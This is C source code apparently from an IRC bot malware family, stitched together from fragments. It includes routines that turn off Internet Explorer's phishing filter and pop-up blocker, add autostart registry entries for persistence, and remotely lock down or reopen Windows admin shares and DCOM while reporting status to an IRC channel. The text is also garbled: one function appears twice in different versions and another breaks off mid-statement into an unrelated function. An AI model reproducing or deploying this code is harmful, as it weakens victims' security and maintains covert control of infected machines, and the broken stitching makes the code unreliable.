/* IE7 Anti Phisher killer */
int phishfuck()
{
DWORD ff = 00000000;
HKEY hRegKey;
fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\PhishingFilter", NULL, NULL, &hRegKey);
fRegSetValueEx(hRegKey,"Enabled",NULL,REG_DWORD,(LPBYTE) &ff,sizeof(DWORD));
Sleep(5000);
return 1;
}
/* Anti pop up blocker for IE6/7 */
int popdown()
{
DWORD z = 00000000;
HKEY hRegKey;
fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\New Windows", NULL, NULL, &hRegKey);
fRegSetValueEx(hRegKey,"PopupMgr",NULL,REG_DWORD,(LPBYTE) &z,sizeof(DWORD));
Sleep(5000);
return 1;
}
void AutoStartRegs(char *nfilename)
{
HKEY key;
for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
if (nfilename)
fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
else
fRegDeleteValue(key, valuename);
fRegCloseKey(key);
}
return;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"nz m (secure.p l g) »» Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
return TRUE;
}
BOOL UnSecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="Y";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Enable DCOM failed.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: DCOM enabled.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000000;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"4<<12[SECURE]: Failed to unrestrict access to the IPC$ Share.4>>");
else
sprintf(sendbuf,"4<<12[SECURE]: Unrestricted access to the IPC$ Share.4>>");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ restriction registry key.4>>");
} else
sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (!nonetapi32) {
for(int i=0;i < ((sizeof(ShareList) / sizeof (NetShares)) - 2);i++) {
if(ShareAdd(NULL,ShareList[i].ShareName,ShareList[i].SharePath) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
char sharename[10], sharepath[10];
DWORD dwDrives = GetLogicalDrives();
for(char cDrive='A'; dwDrives!=0; cDrive++, dwDrives=(dwDrives>>1)) {
if((dwDrives & 1)==1 && cDrive != 'A') {
_snprintf(sharename,sizeof(sharename),"%c$",cDrive);
_snprintf(sharepath,sizeof(sharepath),"%c:\\",cDrive);
if (fGetDriveType(sharepath) == DRIVE_FIXED) {
if(ShareAdd(NULL,sharename,sharepath) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",sharename);
else
_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",sharename);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
}
sprintf(sendbuf,"4<<12[SECURE]: Network shares added.4>>");
} else
BOOL RegWrite(HKEY hKey,LPCTSTR SubKey,LPCTSTR KeyName,DWORD Type,RQUERY Data)
{
HKEY hRegKey;
DWORD dwBuf;
char szRegBuffer[65535+2]; // Only allow writing of 64Kb to a key, include space for double null
int i, nLen;
// Open the registry key
if (fRegCreateKeyEx(hKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hRegKey,NULL) != ERROR_SUCCESS)
{
return FALSE;
}
// If no keyname then we are finished
if (KeyName == 0)
{
fRegCloseKey(hRegKey);
return TRUE;
}
// Write the registry differently depending on type of variable we are writing
switch (Type)
{
case REG_EXPAND_SZ:
nLen=(int)strlen(Data.szQuery);
strcpy(szRegBuffer,Data.szQuery);
if (fRegSetValueEx(hRegKey,KeyName,0,REG_EXPAND_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen+1) != ERROR_SUCCESS)
{
fRegCloseKey(hRegKey);
return FALSE;
}
break;
case REG_SZ:
nLen=(int)strlen(Data.szQuery);
strcpy(szRegBuffer,Data.szQuery);
if (fRegSetValueEx(hRegKey,KeyName,0,REG_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen+1) != ERROR_SUCCESS)
{
fRegCloseKey(hRegKey);
return FALSE;
}
break;
case REG_DWORD:
dwBuf=Data.dwQuery;
if (fRegSetValueEx(hRegKey,KeyName,0,REG_DWORD,(CONST BYTE *)&dwBuf,sizeof(dwBuf)) != ERROR_SUCCESS)
{
fRegCloseKey(hRegKey);
return FALSE;
}
break;
case REG_MULTI_SZ:
nLen=(int)strlen(Data.szQuery);
strcpy(szRegBuffer,Data.szQuery);
// Change all \n to \0 then double null terminate
szRegBuffer[nLen]='\0'; // Double null
szRegBuffer[nLen+1]='\0';
for (i=0;i<nLen;++i)
if (szRegBuffer[i]=='\n')
szRegBuffer[i]='\0';
// If blank then must use nLen = 0, ignoring \0\0 (blank values not allowed)
// Otherwise take our stringlen + 2 (double null) as the size
if (nLen != 0)
nLen = nLen + 2;
if (fRegSetValueEx(hRegKey,KeyName,0,REG_MULTI_SZ,(CONST BYTE *)szRegBuffer,(DWORD)nLen) != ERROR_SUCCESS)
{
fRegCloseKey(hRegKey);
return FALSE;
}
break;
default:
fRegCloseKey(hRegKey);
return FALSE;
break;
}
fRegCloseKey(hRegKey);
return TRUE;
}
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
char sendbuf[IRCLINE];
if (!noadvapi32) {
HKEY hKey;
if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
TCHAR szDataBuf[]="N";
if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
else
sprintf(sendbuf,"[SECURE]: DCOM disabled.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
else
sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
DWORD dwData = 0x00000001;
if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
else
sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");
fRegCloseKey(hKey);
} else
sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_LSARESTRICT
DWORD dwRet;
if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
else
sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
#endif
} else
sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
addlog(sendbuf);
#ifndef NO_NET
if (!nonetapi32) {
PSHARE_INFO_502 pBuf,p;
NET_API_STATUS nStatus;
DWORD entriesread=0,totalread=0,resume=0;
do {
nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);
if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
p = pBuf;
for(unsigned int i=1;i <= entriesread;i++) {
if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
char* szShareName = new char[wcslen(p->shi502_netname)+1];
WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);
if(ShareDel(NULL,szShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
delete szShareName;
}
p++;
}
fNetApiBufferFree(pBuf);
} else {
for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
else
_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
addlog(sendbuf);
}
}
} while (nStatus == ERROR_MORE_DATA);
sprintf(sendbuf,"[SECURE]: Network shares deleted.");
} else
sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
addlog(sendbuf);
#endif
return TRUE;
}